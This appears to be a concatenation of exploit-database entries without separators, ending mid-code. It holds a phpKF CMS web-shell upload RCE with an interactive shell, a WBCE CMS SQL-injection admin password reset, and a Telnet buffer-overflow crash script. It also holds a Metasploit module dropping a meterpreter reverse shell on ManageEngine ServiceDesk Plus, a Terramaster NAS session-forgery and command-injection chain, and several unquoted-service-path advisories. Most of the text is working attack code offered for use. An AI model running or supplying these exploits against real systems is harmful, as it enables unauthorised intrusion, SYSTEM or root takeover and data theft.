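# Exploit Title: phpKF CMS 3.00 Beta y6 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 18/12/2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://www.phpkf.com/
# Software Link: https://www.phpkf.com/indirme.php
# Version: 3.00
# Category: Webapps
# Tested on: Linux/Windows

# phpKF-CMS; It is a very popular content management system for promotion, news, shopping, corporate, friends, blogs and more.
# Contains an endpoint that allows remote access
# Necessary checks are not made in the file upload mechanism, only the file extension is checked
# The file with the extension ".png" can be uploaded and the extension can be changed.
#
# Chain as implemented below:
#   1. self-register a throwaway account via /phpkf-bilesenler/kayit_yap.php
#      (or use existing low-privilege credentials given with -l/-p);
#   2. log in at /uye-giris.php and keep the kullanici_kimlik session cookie;
#   3. POST a PHP web shell to /phpkf-bilesenler/yukleme/index.php under the
#      name evil.png -- only the extension is validated;
#   4. use the same component's rename action to turn evil.png into evil.php;
#   5. read the upload directory back from the file listing and issue commands.
#
# NOTE(review): the "unauthenticated" path relies on open self-registration;
# if the target has it disabled the script tells you to supply -l/-p instead.

# Example: python3 exploit.py -u http://example.com
# python3 exploit.py -u http://example.com -l admin -p Admin123

from bs4 import BeautifulSoup
from urllib.parse import quote
import requests
import argparse

USER_AGENT = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36")
DEFAULT_LOGIN = "evil"
DEFAULT_PASSWORD = "Evil123"
UPLOAD_ENDPOINT = "/phpkf-bilesenler/yukleme/index.php"
# The original issued every request without a timeout; a target that accepts
# the TCP connection and then stalls would hang the script forever.
TIMEOUT = 10
WEBSHELL = "<?php if(isset($_GET['cmd'])){ $cmd = ($_GET['cmd']); system($cmd); die; } ?>"


def main():
    """Parse the command line, print the banner and start the exploit chain."""
    parser = argparse.ArgumentParser(description='phpKF-CMS 3.00 Beta y6 - Remote Code Execution (Unauthenticated)')
    parser.add_argument('-u', '--host', type=str, required=True)
    parser.add_argument('-l', '--login', type=str, required=False)
    parser.add_argument('-p', '--password', type=str, required=False)
    args = parser.parse_args()
    # Half a credential pair silently produced a login attempt with a None field.
    if (args.login is None) != (args.password is None):
        parser.error("-l/--login and -p/--password must be given together")
    print("\nphpKF-CMS 3.00 Beta y6 - Remote Code Execution (Unauthenticated)",
          "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
    host(args)


def normalize_host(raw):
    """Return *raw* with an http:// scheme if none was given and without trailing slashes."""
    if not raw.startswith(('http://', 'https://')):
        raw = "http://" + raw
    return raw.rstrip('/')


def host(args):
    """Normalise the target URL, confirm it answers, then register or log in.

    Exits with status 1 when the target cannot be reached or does not answer 200.
    """
    print("[?] Check Url...\n")
    args.host = normalize_host(args.host)
    try:
        response = requests.get(args.host, timeout=TIMEOUT)
    except requests.RequestException:
        print("[-] Address not reachable!")
        raise SystemExit(1)
    if response.status_code != 200:
        print("[-] Address not reachable!")
        raise SystemExit(1)
    # Without credentials we first self-register a throwaway account.
    if args.login is None and args.password is None:
        create_user(args)
    else:
        login_user(args)


def create_user(args):
    """Self-register DEFAULT_LOGIN/DEFAULT_PASSWORD on the target, then log in with it."""
    print("[*] Create User!\n")
    url = args.host + "/phpkf-bilesenler/kayit_yap.php"
    headers = {
        "Origin": args.host,
        "User-Agent": USER_AGENT,
        # The original sent a foreign Referer (http://fuzzing.com/...); the
        # registration form itself would send the same-origin page.
        "Referer": args.host + "/uye-kayit.php",
        "Accept-Encoding": "gzip, deflate",
    }
    data = {
        "kayit_yapildi_mi": "form_dolu",
        "oturum": '',
        "kullanici_adi": DEFAULT_LOGIN,
        "sifre": DEFAULT_PASSWORD,
        "sifre2": DEFAULT_PASSWORD,
        "posta": "evil@localhost.com",
        "kosul": "on",
    }
    # The registration response is not inspected; login_user() is the real check.
    requests.post(url, headers=headers, data=data, allow_redirects=True, timeout=TIMEOUT)
    args.login = DEFAULT_LOGIN
    args.password = DEFAULT_PASSWORD
    print("[+] " + args.login + ":" + args.password + "\n")
    login_user(args)


def login_user(args):
    """POST the credentials to /uye-giris.php and continue with the session cookie.

    Success is signalled by the server setting the kullanici_kimlik cookie.
    """
    url = args.host + "/uye-giris.php"
    headers = {
        "Origin": args.host,
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": USER_AGENT,
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Referer": args.host + "/uye-giris.php",
        "Accept-Encoding": "gzip, deflate",
    }
    data = {
        "kayit_yapildi_mi": "form_dolu",
        "git": args.host + "/index.php",
        "kullanici_adi": args.login,
        "sifre": args.password,
        "hatirla": "on",
    }
    # Redirects are not followed so the Set-Cookie of the login response itself is read.
    response = requests.post(url, headers=headers, data=data, allow_redirects=False, timeout=TIMEOUT)
    token = response.cookies.get("kullanici_kimlik")
    if token is None:
        print("[!] Unauthorized user!\n")
        if args.login == DEFAULT_LOGIN and args.password == DEFAULT_PASSWORD:
            # Self-registration apparently did not work (disabled or moderated).
            print("[!] manually add a user and try again\n")
            print("[!] Go to link " + args.host + "/uye-kayit.php\n")
            print("python3 exploit.py -u '" + args.host + "' -l 'attacker' -p 'p@ssW0rd'")
        return
    print("[!] Login Success!\n")
    upload_evil(args, token)


def _upload_post(args, token, data, extra_headers=None):
    """POST *data* to the upload component as the logged-in user and return the response.

    All three upload-component actions share the same cookies and headers; the
    original repeated them verbatim in each function.
    """
    cookies = {"kullanici_kimlik": token, "dil": "en"}
    headers = {
        "User-Agent": USER_AGENT,
        "Content-type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Accept": "*/*",
        "Origin": args.host,
        "Referer": args.host + "/oi_yaz.php",
        "Accept-Encoding": "gzip, deflate",
    }
    if extra_headers:
        headers.update(extra_headers)
    return requests.post(args.host + UPLOAD_ENDPOINT, headers=headers,
                         cookies=cookies, data=data, timeout=TIMEOUT)


def upload_evil(args, token):
    """Upload the PHP web shell under a .png name (only the extension is checked)."""
    # The raw request body is the file content; the file name travels in the
    # DOSYA-ADI header (VERICEK is sent empty, presumably the target folder).
    response = _upload_post(args, token, WEBSHELL, {"VERICEK": "", "DOSYA-ADI": "evil.png"})
    if response.text != "yuklendi":  # Turkish: "uploaded"
        print("[!] Upload Failed!\n")
        return
    print("[!] Upload Success!\n")
    change_name(args, token)


def change_name(args, token):
    """Rename evil.png to evil.php through the component's rename action."""
    data = {"yenidenadlandir": "evil.png|evil.php", "vericek": "/"}
    response = _upload_post(args, token, data)
    if response.text != "Name successfully changed...":
        print("[!] Change Failed!\n")
        return
    print("[!] Change Name evil.php!\n")
    find_dict(args, token)


def find_dict(args, token):
    """List the upload directory to learn the web path under which evil.php lives."""
    response = _upload_post(args, token, {"vericek": "/", "dds": "0"})
    if response.text == "You can not upload files!":
        print("[!] File not found!\n")
        return
    soup = BeautifulSoup(response.text, 'html.parser')
    div = soup.find("div")
    # The listing's first <div> is expected to carry the directory path as its
    # second child; the original indexed it blindly and crashed on any other layout.
    if div is None or len(div.contents) < 2:
        print("[!] Could not read the upload path from the listing!\n")
        return
    path = str(div.contents[1]).replace(" ", "")
    print("[!] Find Vuln File!\n")
    exploit(args, path)


def exploit(args, path):
    """Interactive loop: send each command to the web shell and print its output.

    Type 'exit'/'quit' (or Ctrl-D / Ctrl-C) to leave; the original loop could
    only be killed.
    """
    print("[+] Exploit Done!\n")
    headers = {
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
    }
    shell = args.host + path + "evil.php"
    print("[*] Shell: " + shell + "  (type 'exit' to quit)\n")
    while True:
        try:
            cmd = input("$ ")
        except (EOFError, KeyboardInterrupt):
            print()
            break
        if not cmd.strip():
            continue
        if cmd.strip() in ("exit", "quit"):
            break
        # Percent-encode the command: a space, '&' or '#' pasted raw into the
        # query string would otherwise split or truncate it.
        url = shell + "?cmd=" + quote(cmd, safe="")
        try:
            response = requests.post(url, headers=headers, timeout=5)
        except requests.RequestException as exc:
            print("[-] request failed: " + str(exc))
            continue
        if response.text == "":
            # An empty body only means the command printed nothing, not that it is missing.
            print(cmd + ": (no output)\n")
        else:
            print(response.text)


if __name__ == '__main__':
    main()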
<pre><code>#Exploit Title: Connectify Hotspot 2018 'ConnectifyService' - Unquoted Service Path<br />#Exploit Author : SamAlucard<br />#Exploit Date: 2022-02-17<br />#Vendor : Connectify Inc<br />#Version : Connectify Hotspot 2018<br />#Vendor Homepage : https://www.connectify.me/<br />#Tested on OS: Windows 7 Pro<br /><br />#Analyze PoC :<br />==============<br /><br />C:\>sc qc Connectify<br />[SC] QueryServiceConfig CORRECTO<br /><br />NOMBRE_SERVICIO: Connectify<br /> TIPO : 10 WIN32_OWN_PROCESS<br /> TIPO_INICIO : 2 AUTO_START<br /> CONTROL_ERROR : 1 NORMAL<br /> NOMBRE_RUTA_BINARIO: C:\Program Files<br />(x86)\Connectify\ConnectifyService.exe<br /> GRUPO_ORDEN_CARGA :<br /> ETIQUETA : 0<br /> NOMBRE_MOSTRAR : Connectify Hotspot 2018<br /> DEPENDENCIAS : wlansvc<br /> : winmgmt<br /> : http<br /> NOMBRE_INICIO_SERVICIO: LocalSystem<br /><br /></code></pre>
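# Exploit Title: WBCE CMS 1.5.1 - Admin Password Reset
# Google Dork: intext: "Way Better Content Editing"
# Date: 20/12/2021
# Exploit Author: citril or https://github.com/maxway2021
# Vendor Homepage: https://wbce.org/
# Software Link: https://wbce.org/de/downloads/
# Version: <= 1.5.1
# Tested on: Linux
# CVE : CVE-2021-3817
# Github repo: https://github.com/WBCE/WBCE_CMS
# Writeup: https://medium.com/@citril/cve-2021-3817-from-sqli-to-plaintext-admin-password-recovery-13735773cc75
#
# Mechanism as implemented below: the forgot-password handler takes the
# submitted "email" value into its user lookup unparameterised.  The payload
# closes the string and ORs in user_id=1 (the administrator, per the author)
# together with an address at a domain you control, so the reset mail for that
# account is presumably sent to the injected address.  Because the delivered
# local part is the whole injected string, a catch-all mailbox on that domain
# is required (the author used Namecheap's catch-all redirect).
#
# Usage: python3 exploit.py [FORGOT_URL] [DOMAIN]
#        defaults are the author's local test values below.

import argparse

DEFAULT_URL = 'http://localhost/wbce/admin/login/forgot/index.php'  # from mylocalhost environment
DEFAULT_DOMAIN = 'pylibs.org'  # you have to catch all emails!

HEADERS = {
    'User-Agent': 'Mozilla/5.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Connection': 'close',
}


def build_payload(domain):
    """Return the raw form body that injects into the forgot-password lookup.

    The body is sent verbatim (not re-encoded), so the leading quote is
    pre-encoded as %27 and the '@' as %40 exactly as the author did.
    """
    return "email=%27/**/or/**/user_id=1/**/or/**/'admin%40" + domain + "&submit=justrandomvalue"


def main():
    """Send the injected form body and report whether the endpoint accepted it."""
    # Imported here so build_payload() can be imported without the dependency.
    import requests

    parser = argparse.ArgumentParser(description='WBCE CMS <= 1.5.1 admin password reset (CVE-2021-3817)')
    parser.add_argument('url', nargs='?', default=DEFAULT_URL,
                        help='forgot-password endpoint, e.g. http://host/wbce/admin/login/forgot/index.php')
    parser.add_argument('domain', nargs='?', default=DEFAULT_DOMAIN,
                        help='domain whose mail you receive (catch-all mailbox recommended)')
    args = parser.parse_args()

    try:
        r = requests.post(url=args.url, headers=HEADERS, data=build_payload(args.domain), timeout=15)
    except requests.RequestException as exc:
        print('[-] request failed: ' + str(exc))
        raise SystemExit(1)

    # A 200 only proves the form was processed; it does not prove the injection
    # fired -- the mailbox is the real oracle.
    if r.status_code == 200:
        print('[+] Check your email, you are probably going to receive plaintext password which belongs to administrator.')
    else:
        print('[-] unexpected HTTP status ' + str(r.status_code))


if __name__ == '__main__':
    main()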
# Exploit Title: Wondershare Dr.Fone 11.4.9 - 'DFWSIDService' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-17
# Vendor Homepage: https://www.wondershare.com/
# Software Link : https://download.wondershare.com/drfone_full3360.exe
# Tested Version: 11.4.9
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DFWSIDService" | findstr /i /v """

Wondershare WSID help DFWSIDService C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe Auto


# Service info:

C:\>sc qc DFWSIDService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: DFWSIDService
 TYPE : 10 WIN32_OWN_PROCESS
 START_TYPE : 2 AUTO_START
 ERROR_CONTROL : 1 NORMAL
 BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe
 LOAD_ORDER_GROUP :
 TAG : 0
 DISPLAY_NAME : Wondershare WSID help
 DEPENDENCIES :
 SERVICE_START_NAME : LocalSystem

#Exploit:

The service starts automatically as LocalSystem and its BINARY_PATH_NAME is unquoted and contains spaces, so the Service Control Manager resolves it the way CreateProcess does, trying each space-delimited prefix before the full path: C:\Program.exe, then C:\Program Files.exe, then C:\Program Files (x86)\Wondershare\Wondershare.exe, and only then the real WsidService.exe. A local user who can create a file under one of those names (i.e. who has write access to C:\ or to C:\Program Files (x86)\Wondershare\) gets it executed as SYSTEM at the next service start or reboot. Default Windows ACLs do not grant standard users file-creation rights in those directories, so exploitability depends on weakened permissions there; verify with icacls before treating this as a working privilege escalation.
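#!/usr/bin/env python3
# Exploit Title: Accu-Time Systems MAXIMUS 1.0 Telnet Remote Buffer Overflow
# Discovered by: Yehia Elghaly
# Discovered Date: 2021-12-22
# Vendor Homepage: https://www.accu-time.com/
# Software Link : https://www.accu-time.com/maximus-employee-time-clock-3/
# Tested Version: 1.0
# Vulnerability Type: Buffer Overflow (DoS) Remote
# Tested on OS: linux

# Description: Accu-Time Systems MAXIMUS 1.0 Telnet Remote Buffer Overflow

# Steps to reproduce:
# 1. - Accu-Time Systems MAXIMUS 1.0 Telnet listening on port 23
# 2. - Run the Script from remote PC/IP
# 3. - Telnet Crashed
#
# NOTE(review): the original listing never sent its 9400-byte buffer (it sent a
# short status string instead), used Python 2 print syntax under a python3
# shebang, and swallowed every error with a bare except.  This version sends
# the buffer and then probes the port again to report whether the service is
# still accepting connections.

"""Crash-only PoC: send an oversized line to the MAXIMUS telnet service."""

import socket
import sys

DEFAULT_PORT = 23
# Number of bytes the author reports as sufficient to crash the service.
PAYLOAD_SIZE = 9400
BANNER = (
    "#######################################################\n"
    "# Accu-Time Systems MAXIMUS Remote (BUffer Overflow) #\n"
    "# -------------------------- #\n"
    "# BY Yehia Elghaly #\n"
    "#######################################################"
)


def build_payload(size=PAYLOAD_SIZE):
    """Return *size* bytes of 'A' -- the overflow trigger."""
    return b"A" * size


def send_payload(host, port=DEFAULT_PORT, size=PAYLOAD_SIZE, timeout=5.0):
    """Connect to host:port and send the whole payload; raises OSError on failure."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_payload(size))


def service_responds(host, port=DEFAULT_PORT, timeout=3.0):
    """Return True if a fresh TCP connection to host:port still succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def main(argv):
    """Entry point: argv[1] is the target host. Returns the process exit status."""
    print(BANNER)
    if len(argv) < 2:
        print("Usage: %s <Target Host> " % argv[0])
        print("Example: %s 192.168.113.1 " % argv[0])
        return 0

    target = argv[1]
    print("\nSending Evil.......Buffer...")
    try:
        send_payload(target)
    except OSError as exc:
        print("Could not connect to ACCU Time Telnet! (%s)" % exc)
        return 1

    # The send itself cannot tell us the outcome; re-probing the port can.
    # A device that restarts the daemon quickly may still look alive here.
    if service_responds(target):
        print("Payload sent; telnet port still accepts connections (no crash observed).")
    else:
        print("Crashed: telnet port no longer accepts connections.")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))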
# Exploit Title: Wondershare MobileTrans 3.5.9 - 'ElevationService' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-17
# Vendor Homepage: https://www.wondershare.com/
# Software Link : https://download.wondershare.com/mobiletrans_full5793.exe
# Tested Version: 3.5.9
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ElevationService" | findstr /i /v """

Wondershare Driver Install Service help ElevationService C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe Auto


# Service info:

C:\>sc qc ElevationService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ElevationService
 TYPE : 10 WIN32_OWN_PROCESS
 START_TYPE : 2 AUTO_START
 ERROR_CONTROL : 1 NORMAL
 BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe
 LOAD_ORDER_GROUP :
 TAG : 0
 DISPLAY_NAME : Wondershare Driver Install Service help
 DEPENDENCIES :
 SERVICE_START_NAME : LocalSystem

#Exploit:

The service starts automatically as LocalSystem and its BINARY_PATH_NAME is unquoted, so the Service Control Manager resolves it the way CreateProcess does, trying each space-delimited prefix before the full path: C:\Program.exe, then C:\Program Files.exe, and only then the real ElevationService.exe. The only spaces in this path are in "Program Files (x86)", so the planted file would have to live directly in C:\; a local user who can create files there gets the file executed as SYSTEM at the next service start or reboot. Default Windows ACLs do not let standard users create files in C:\ (only folders), so exploitability depends on weakened permissions on the drive root; verify with icacls before treating this as a working privilege escalation.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# CVE-2021-44077: unauthenticated RCE in ManageEngine ServiceDesk Plus.
#
# Flow (see #exploit): the payload EXE is written through the unauthenticated
# /RestAPI/ImportTechnicians upload under the name msiexec.exe, then the
# /RestAPI/s247action endpoint is told to run the Site24x7 agent installation,
# which (per the description) ends up executing that msiexec.exe as SYSTEM.
# The dropped file is not removed automatically -- see #on_new_session.
class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  # AutoCheck runs #check before #exploit and aborts on Safe/Unknown.
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  # Provides generate_payload_exe used in #upload_msiexec.
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ManageEngine ServiceDesk Plus CVE-2021-44077',
        'Description' => %q{
          This module exploits CVE-2021-44077, an unauthenticated remote code
          execution vulnerability in ManageEngine ServiceDesk Plus, to upload an
          EXE (msiexec.exe) and execute it as the SYSTEM account.

          Note that build 11305 is vulnerable to the authentication bypass but
          not the file upload. The module will check for an exploitable build.
        },
        'Author' => [
          # Discovered by unknown threat actors
          'wvu', # Analysis and exploit
          'Y4er' # Additional confirmation
        ],
        'References' => [
          ['CVE', '2021-44077'],
          ['URL', 'https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above'],
          ['URL', 'https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021'],
          ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/aa21-336a'],
          ['URL', 'https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/'],
          ['URL', 'https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis'],
          ['URL', 'https://xz.aliyun.com/t/10631'] # Y4er's writeup
        ],
        'DisclosureDate' => '2021-09-16',
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => [ARCH_X86, ARCH_X64],
        # The session runs as SYSTEM, hence Privileged.
        'Privileged' => true,
        'Targets' => [
          ['Windows Dropper', {}]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 8080,
          'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp'
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          # The EXE stays on disk and both REST calls are logged by the application.
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  # Vulnerability check: the ImportTechnicians form is only served by builds
  # that still carry the exploitable upload (it was removed after 11303), so
  # its presence is reported as Appears and its absence as Safe.  Build 11305,
  # which has the auth bypass but not the upload, therefore comes back Safe.
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/RestAPI/ImportTechnicians')
    )

    unless res
      return CheckCode::Unknown('Target failed to respond to check.')
    end

    # NOTE: /RestAPI/ImportTechnicians was removed after build 11303
    unless res.code == 200 && res.get_html_document.at('//form[@name="ImportTechnicians"]')
      return CheckCode::Safe('/RestAPI/ImportTechnicians is not present.')
    end

    CheckCode::Appears('/RestAPI/ImportTechnicians is present.')
  end

  # Two-step chain: drop the payload, then trigger its execution.
  def exploit
    upload_msiexec
    execute_msiexec
  end

  # Upload the generated payload EXE as "msiexec.exe" through the
  # unauthenticated technician-import form.  The "step" field only needs to be
  # present, so it is filled with a random word.  Note the success condition:
  # the server answers 401 with an error page, yet the file has already been
  # written -- that 401 + 'sdp.vulnerability.exceptionerror.title' pair is what
  # the module accepts as success; any other response is reported as
  # NotVulnerable.
  def upload_msiexec
    print_status('Uploading msiexec.exe')

    form = Rex::MIME::Message.new
    form.add_part(Faker::Hacker.verb, nil, nil, 'form-data; name="step"')
    form.add_part(generate_payload_exe, 'application/octet-stream', 'binary',
                  'form-data; name="theFile"; filename="msiexec.exe"')

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/RestAPI/ImportTechnicians'),
      'ctype' => "multipart/form-data; boundary=#{form.bound}",
      'data' => form.to_s
    )

    unless res&.code == 401 && res.body.include?('sdp.vulnerability.exceptionerror.title')
      fail_with(Failure::NotVulnerable, 'Failed to upload msiexec.exe')
    end

    print_good('Successfully uploaded msiexec.exe')
  end

  # Ask the s247action endpoint to run the Site24x7 agent installation, which
  # is what launches the dropped msiexec.exe.  The request is sent with a
  # timeout of 0 (fire-and-forget) because the handler blocks on the payload
  # and, as the original comment says, does not come back.
  def execute_msiexec
    print_status('Executing msiexec.exe')

    # This endpoint "won't" return
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/RestAPI/s247action'),
      'vars_post' => {
        'execute' => 's247AgentInstallationProcess'
      }
    }, 0)
  end

  # No automatic cleanup: the payload is still running as the service's
  # msiexec.exe when the session arrives, so it cannot be deleted yet.
  # XXX: FileDropper dies a miserable death if the file is in use
  def on_new_session(_session)
    super

    # Working directory is C:\Program Files\ManageEngine\ServiceDesk\site24x7
    print_warning("Yo, don't forget to clean up ..\\bin\\msiexec.exe")
  end

end
# Exploit Title: Wondershare FamiSafe 1.0 - 'FSService' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-17
# Vendor Homepage: https://www.wondershare.com/
# Software Link : https://download-es.wondershare.com/famisafe_full7869.exe
# Tested Version: 1.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "FSService" | findstr /i /v """

FSService FSService C:\Program Files (x86)\Wondershare\FamiSafe\FSService.exe Auto


# Service info:

C:\>sc qc FSService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: FSService
 TYPE : 10 WIN32_OWN_PROCESS
 START_TYPE : 2 AUTO_START
 ERROR_CONTROL : 1 NORMAL
 BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\FamiSafe\FSService.exe
 LOAD_ORDER_GROUP :
 TAG : 0
 DISPLAY_NAME : FSService
 DEPENDENCIES :
 SERVICE_START_NAME : LocalSystem

#Exploit:

The service starts automatically as LocalSystem and its BINARY_PATH_NAME is unquoted, so the Service Control Manager resolves it the way CreateProcess does, trying each space-delimited prefix before the full path: C:\Program.exe, then C:\Program Files.exe, and only then the real FSService.exe. The only spaces in this path are in "Program Files (x86)", so the planted file would have to live directly in C:\; a local user who can create files there gets the file executed as SYSTEM at the next service start or reboot. Default Windows ACLs do not let standard users create files in C:\ (only folders), so exploitability depends on weakened permissions on the drive root; verify with icacls before treating this as a working privilege escalation.
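#!/usr/bin/env python3

"""
Product: Terramaster F4-210, Terramaster F2-210
Version: TOS 4.2.X (4.2.15-2107141517)
Author: n0tme (thatsn0tmysite)
Description: Chain from unauthenticated to root via session crafting.

Chain as implemented below:
  1. the unauthenticated mobile/wapNasIPS API returns the device MAC ("ADDR")
     and a "PWD" value that doubles as the authorization header;
  2. a session cookie (kod_token) is MD5(MAC[6:] + secret), so with those two
     values the cookie of any account -- including guest -- can be forged;
  3. the guest session can fetch arbitrary files via mobile/fileDownload; that
     is used to read /etc/group and enumerate the members of the admin group;
  4. an admin session then either creates a new admin user or triggers one of
     three command injections under /tos/index.php (RCE 1 and 2 are blind).
"""

import urllib3
import requests
import json
import argparse
import hashlib
import time
import os
from urllib.parse import quote

TARGET = None
MAC_ADDRESS = None
PWD = None
TIMESTAMP = None


def tos_encrypt_str(toencrypt):
    """Return the TOS token for *toencrypt*: MD5 of the MAC address tail plus the value."""
    key = MAC_ADDRESS[6:]
    return hashlib.md5(f"{key}{toencrypt}".encode("utf8")).hexdigest()


def user_session(session, username):
    """Replace the session cookies with a forged kod_name/kod_token pair for *username*.

    The guest account uses an empty secret; every other user uses PWD.
    """
    session.cookies.clear()
    cookies = {"kod_name": username, "kod_token": tos_encrypt_str(PWD)}
    if username == "guest":
        cookies = {"kod_name": "guest", "kod_token": tos_encrypt_str("")}

    for name, value in cookies.items():
        session.cookies[name] = value


def _fetch(session, path):
    """Return the raw bytes of *path* on the NAS, read through the guest session."""
    user_session(session, "guest")
    r = session.post(f"{TARGET}/module/api.php?mobile/fileDownload", data={"path": path})
    return r.content


def download(session, path, save_as=None):
    """Download *path* from the NAS into the current directory (or *save_as*)."""
    filename = os.path.basename(path) if save_as is None else save_as
    with open(filename, "wb") as file:
        file.write(_fetch(session, path))


def get_admin_users(session):
    """Return the members of the NAS's 'admin' group, or [] if the group is absent.

    The original wrote /etc/group to a fixed, predictable /tmp path and left it
    behind (and returned None) when no admin line was found; parsing the bytes
    in memory avoids both the temp-file race and the disk artefact.
    """
    text = _fetch(session, "/etc/group").decode("utf8", errors="replace")
    for line in text.splitlines():
        fields = line.strip().split(':')
        if len(fields) >= 4 and fields[0] == "admin":
            return [user for user in fields[3].split(",") if user]
    return []


if __name__ == '__main__':
    p = argparse.ArgumentParser()
    p.add_argument(dest="target", help="Target URL (e.g. http://10.0.0.100:8181)")
    p.add_argument("--cmd", dest="cmd", help="Command to run", default="id")
    p.add_argument("-d", "--download", dest="download", help="Only download file", default=None)
    p.add_argument("-o", "--output", dest="save_as", help="Save downloaded file as", default=None)
    p.add_argument("-c", "--create", dest="create", help="Only create admin user (format should be admin:password)", default=None)
    p.add_argument("--tor", dest="tor", default=False, action="store_true", help="Use TOR")
    p.add_argument("--rce", dest="rce", default=0, type=int, help="RCE to use (1 and 2 have no output)")
    args = p.parse_args()
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

    TARGET = args.target.rstrip("/")

    s = requests.Session()
    # The InsecureRequestWarning was silenced but certificate verification was
    # never actually disabled, so an HTTPS target with a self-signed certificate
    # (common on such appliances) would still fail; make the intent explicit.
    s.verify = False
    if args.tor:
        # socks5h: resolve the hostname through Tor; plain socks5 leaks the DNS
        # lookup to the local resolver.
        s.proxies = {"http": "socks5h://127.0.0.1:9050", "https": "socks5h://127.0.0.1:9050"}
    s.headers.update({"user-device": "TNAS", "user-agent": "TNAS"})

    # Unauthenticated call that leaks the two values every forged token needs.
    r = s.post(f"{TARGET}/module/api.php?mobile/wapNasIPS")
    try:
        j = r.json()
        PWD = j["data"]["PWD"]
        MAC_ADDRESS = j["data"]["ADDR"]
    except (ValueError, KeyError, TypeError):
        print(f"[-] wapNasIPS did not return PWD/ADDR (HTTP {r.status_code}); target is probably not a vulnerable TOS")
        raise SystemExit(1)

    TIMESTAMP = str(int(time.time()))
    s.headers.update({"signature": tos_encrypt_str(TIMESTAMP), "timestamp": TIMESTAMP})
    s.headers.update({"authorization": PWD})

    if args.download is not None:
        download(s, args.download, save_as=args.save_as)
        raise SystemExit(0)

    # Percent-encode the command so spaces, '&' and '#' survive the query string.
    cmd = quote(args.cmd, safe="")
    RCEs = [
        f"{TARGET}/tos/index.php?app/del&id=0&name=;{cmd};xx%23",
        f"{TARGET}/tos/index.php?app/hand_app&name=;{cmd};xx.tpk",  # BLIND
        f"{TARGET}/tos/index.php?app/app_start_stop&id=ups&start=0&name=donotcare.*.oexe;{cmd};xx",  # BLIND
    ]
    if not 0 <= args.rce < len(RCEs):
        p.error(f"--rce must be between 0 and {len(RCEs) - 1}")

    admins = get_admin_users(s)
    if not admins:
        print("[-] no members found in the admin group of /etc/group; cannot forge an admin session")
        raise SystemExit(1)

    for admin in admins:
        user_session(s, admin)
        if args.create is not None:
            # Split once so a password containing ':' is kept intact.
            user, password = args.create.split(":", 1)
            groups = json.dumps(["allusers", "admin"])
            r = s.post(f"{TARGET}/module/api.php?mobile/__construct")
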